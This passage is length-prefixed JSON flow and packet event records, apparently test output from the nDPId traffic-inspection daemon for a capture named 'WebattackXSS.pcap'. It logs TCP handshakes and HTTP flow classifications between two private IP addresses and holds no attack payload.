+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":2,"flow_last_seen":1499347080793,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347080793,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0KAcF4FK1faR6KAScSAGXQAAAgQFtAQCCAoD4yfYATlWYQEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":973,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":3,"flow_last_seen":1499347080794,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347080794,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0x4dAAD4G\/lCsEAABwKgKMtCgAFDV9pHoHBeBS4AQAOWlZAAAAQEICgE5VmED4yfY"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":980,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347082084,"flow_last_seen":1499347082084,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347082084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53422,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":980,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1499347082084,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347082084,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rj9AAD4GF5GsEAABwKgKMtCuAFC6z\/mcAAAAAKACchCAvAAAAgQFtAQCCAoBOVejAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":981,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":2,"flow_last_seen":1499347082084,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347082084,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0K6mztSPus\/5naAScSDZPwAAAgQFtAQCCAoD4ykaATlXowEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":982,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":3,"flow_last_seen":1499347082085,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347082085,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rkBAAD4GF5isEAABwKgKMtCuAFC6z\/mdps7UkIAQAOV4RgAAAQEICgE5V6QD4yka"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":989,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347083358,"flow_last_seen":1499347083358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347083358,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53436,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":989,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1499347083358,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347083358,"pkt":"ABm5CmnxAMGxFOsxCABFAAA81M5AAD4G8QGsEAABwKgKMtC8AFCsV4wsAAAAAKACchD7VwAAAgQFtAQCCAoBOVjiAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":990,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":2,"flow_last_seen":1499347083358,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347083358,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0LzW0\/50rFeMLaAScSD4sQAAAgQFtAQCCAoD4ypZATlY4gEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":991,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":3,"flow_last_seen":1499347083359,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347083359,"pkt":"ABm5CmnxAMGxFOsxCABFAAA01M9AAD4G8QisEAABwKgKMtC8AFCsV4wt1tP+dYAQAOWXuQAAAQEICgE5WOID4ypZ"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1004,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347084644,"flow_last_seen":1499347084644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347084644,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53450,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1004,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1499347084644,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347084644,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8o6RAAD4GIiysEAABwKgKMtDKAFAgx\/mHAAAAAKACchAYPgAAAgQFtAQCCAoBOVojAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1005,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":2,"flow_last_seen":1499347084644,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347084644,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0Mrcl6UQIMf5iKAScSBn9wAAAgQFtAQCCAoD4yuaATlaIwEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1006,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":3,"flow_last_seen":1499347084645,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347084645,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0o6VAAD4GIjOsEAABwKgKMtDKAFAgx\/mI3JelEYAQAOUG\/gAAAQEICgE5WiQD4yua"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1022,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347087256,"flow_last_seen":1499347087256,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347087256,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53476,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1022,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1499347087256,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347087256,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8beFAAD4GV++sEAABwKgKMtDkAFAnsDFRAAAAAKACchDW5AAAAgQFtAQCCAoBOVywAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1023,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":2,"flow_last_seen":1499347087256,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347087256,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0OTlcRoYJ7AxUqAScSCmLwAAAgQFtAQCCAoD4y4nATlcsAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1024,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":3,"flow_last_seen":1499347087257,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347087257,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0beJAAD4GV\/asEAABwKgKMtDkAFAnsDFS5XEaGYAQAOVFNgAAAQEICgE5XLED4y4n"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1034,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347088552,"flow_last_seen":1499347088552,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347088552,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53490,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1034,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1499347088552,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347088552,"pkt":"ABm5CmnxAMGxFOsxCABFAAA892FAAD4Gzm6sEAABwKgKMtDyAFAECKqUAAAAAKACchB\/9gAAAgQFtAQCCAoBOV31AAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1035,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":1499347088552,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347088552,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0PJdbGlkBAiqlaAScSCGtgAAAgQFtAQCCAoD4y9rATld9QEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1036,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":3,"flow_last_seen":1499347088553,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347088553,"pkt":"ABm5CmnxAMGxFOsxCABFAAA092JAAD4GznWsEAABwKgKMtDyAFAECKqVXWxpZYAQAOUlvgAAAQEICgE5XfUD4y9r"} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1499346956870,"flow_last_seen":1499346960891,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7926,"flow_tot_l4_payload_len":16625,"flow_avg_l4_payload_len":503,"midstream":0,"thread_ts_msec":1499347088637,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52200,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346956932,"flow_last_seen":1499346960891,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347088637,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52202,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346956932,"flow_last_seen":1499346960891,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347088637,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52202,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346957283,"flow_last_seen":1499346960891,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347088637,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52220,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346957283,"flow_last_seen":1499346960891,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347088637,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52220,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346957283,"flow_last_seen":1499346960891,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347088637,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52222,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346957283,"flow_last_seen":1499346960891,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347088637,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52222,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1056,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347091102,"flow_last_seen":1499347091102,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347091102,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53516,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1056,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1499347091102,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347091102,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8uhVAAD4GC7usEAABwKgKMtEMAFDkONpnAAAAAKACchBtWwAAAgQFtAQCCAoBOWByAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1057,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":2,"flow_last_seen":1499347091102,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347091102,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0QySpl9e5DjaaKAScSBGaQAAAgQFtAQCCAoD4zHpATlgcgEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1058,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":3,"flow_last_seen":1499347091103,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347091103,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0uhZAAD4GC8KsEAABwKgKMtEMAFDkONpokqZfX4AQAOXlcAAAAQEICgE5YHID4zHp"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1065,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347092374,"flow_last_seen":1499347092374,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347092374,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53530,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1065,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1499347092374,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347092374,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rL1AAD4GGROsEAABwKgKMtEaAFBpN80NAAAAAKACchD0agAAAgQFtAQCCAoBOWGwAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1066,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":2,"flow_last_seen":1499347092375,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347092375,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0RpaHI+7aTfNDqAScSDUZwAAAgQFtAQCCAoD4zMnATlhsAEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1067,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":3,"flow_last_seen":1499347092375,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347092375,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rL5AAD4GGRqsEAABwKgKMtEaAFBpN80OWhyPvIAQAOVzbwAAAQEICgE5YbAD4zMn"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1080,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347093662,"flow_last_seen":1499347093662,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347093662,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53544,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1080,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1499347093662,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347093662,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Ku9AAD4GmuGsEAABwKgKMtEoAFAtsEgdAAAAAKACchCzkgAAAgQFtAQCCAoBOWLyAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1081,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":2,"flow_last_seen":1499347093662,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347093662,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0Shd8PQZLbBIHqAScSAqGwAAAgQFtAQCCAoD4zRpATli8gEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1082,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":3,"flow_last_seen":1499347093663,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347093663,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0KvBAAD4GmuisEAABwKgKMtEoAFAtsEgeXfD0GoAQAOXJIgAAAQEICgE5YvID4zRp"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1095,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347096201,"flow_last_seen":1499347096201,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347096201,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53570,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1095,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1499347096201,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347096201,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ZsxAAD4GXwSsEAABwKgKMtFCAFCngwOhAAAAAKACchB7pgAAAgQFtAQCCAoBOWVtAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1096,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":2,"flow_last_seen":1499347096202,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347096202,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0UJnxk6+p4MDoqAScSCLOQAAAgQFtAQCCAoD4zbkATllbQEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1097,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":3,"flow_last_seen":1499347096202,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347096202,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Zs1AAD4GXwusEAABwKgKMtFCAFCngwOiZ8ZOv4AQAOUqQQAAAQEICgE5ZW0D4zbk"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1107,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347097460,"flow_last_seen":1499347097460,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347097460,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53584,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1107,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1499347097460,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347097460,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83YdAAD4G6EisEAABwKgKMtFQAFAbC7sgAAAAAKACchBPVwAAAgQFtAQCCAoBOWanAAAAAAEDAwc="} 